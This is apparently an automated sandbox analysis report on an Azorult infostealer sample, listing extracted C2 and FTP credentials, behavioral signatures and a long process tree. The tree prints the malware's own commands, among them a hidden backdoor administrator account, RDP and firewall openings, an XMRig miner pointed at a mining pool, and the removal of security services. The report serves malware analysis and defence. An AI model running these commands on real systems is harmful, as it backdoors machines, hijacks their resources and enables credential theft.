Resubmissions
18/11/2020, 14:18 UTC
201118-dj27sn3f52 1018/11/2020, 13:42 UTC
201118-1arz86e7w6 1018/11/2020, 13:38 UTC
201118-n8jh228ctn 10Analysis
-
max time kernel
1802s -
max time network
1804s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18/11/2020, 14:18 UTC
General
-
Target
LtHv0O2KZDK4M637.bin.exe
Score
10/10
Malware Config
Extracted
Credentials
Protocol: ftp- Host:
109.248.203.81 - Port:
21 - Username:
alex - Password:
easypassword
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs
-
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
-
UAC bypass 3 TTPs
-
Windows security bypass 2 TTPs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
XMRig Miner Payload 2 IoCs
-
ASPack v2.12-2.42 9 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocks application from running via registry modification
Adds application to list of disallowed applications.
-
Drops file in Drivers directory 4 IoCs
-
Executes dropped EXE 20 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
-
Stops running service(s) 3 TTPs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 5 IoCs
-
Modifies file permissions 1 TTPs 64 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Modifies WinLogon 2 TTPs 7 IoCs
-
Drops file in Program Files directory 31 IoCs
-
Drops file in Windows directory 8 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 9 IoCs
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Kills process with taskkill 6 IoCs
-
Modifies data under HKEY_USERS 18 IoCs
-
Modifies registry class 6 IoCs
-
NTFS ADS 2 IoCs
-
Runs .reg file with regedit 2 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 13 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 3 IoCs
-
Views/modifies file attributes 1 TTPs 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe"C:\Users\Admin\AppData\Local\Temp\LtHv0O2KZDK4M637.bin.exe"1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Checks whether UAC is enabled
- Modifies WinLogon
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
-
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"5⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"5⤵
- Runs .reg file with regedit
-
-
C:\Windows\SysWOW64\timeout.exetimeout 25⤵
- Delays execution with timeout.exe
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10005⤵
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own5⤵
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"5⤵
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Windows Mail\WinMail.exe"C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE4⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE5⤵
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat4⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 55⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\ProgramData\install\sys.exeC:\ProgramData\install\sys.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "sys.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exeC:\Windows\system32\timeout.exe 34⤵
- Delays execution with timeout.exe
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui2⤵
- Executes dropped EXE
-
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list6⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list7⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns5⤵
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns6⤵
- Gathers network information
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
-
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://fontdrvhost.ru:3333 -u CPU --donate-level=1 -k -t15⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny Администраторы:(F)5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny System:(F)5⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\SysWOW64\drivers\conhost.exe /deny система:(F)5⤵
- Modifies file permissions
-
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe4⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "6⤵
- Modifies registry class
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\chcp.comchcp 12517⤵
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar7⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "8⤵
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f9⤵
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f9⤵
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow9⤵
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add10⤵
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 12519⤵
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add10⤵
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o9⤵
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow10⤵
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w9⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f9⤵
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited9⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited10⤵
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"9⤵
- Drops file in Program Files directory
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"9⤵
- Views/modifies file attributes
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 27⤵
- Delays execution with timeout.exe
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt4⤵
-
C:\Windows\SysWOW64\sc.exesc start appmgmt5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto4⤵
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv4⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice4⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc4⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer4⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer4⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_644⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_645⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"4⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql4⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out5⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP1" protocol=TCP action=block dir=IN remoteip=61.216.5.1-61.216.5.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2555⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2554⤵
-
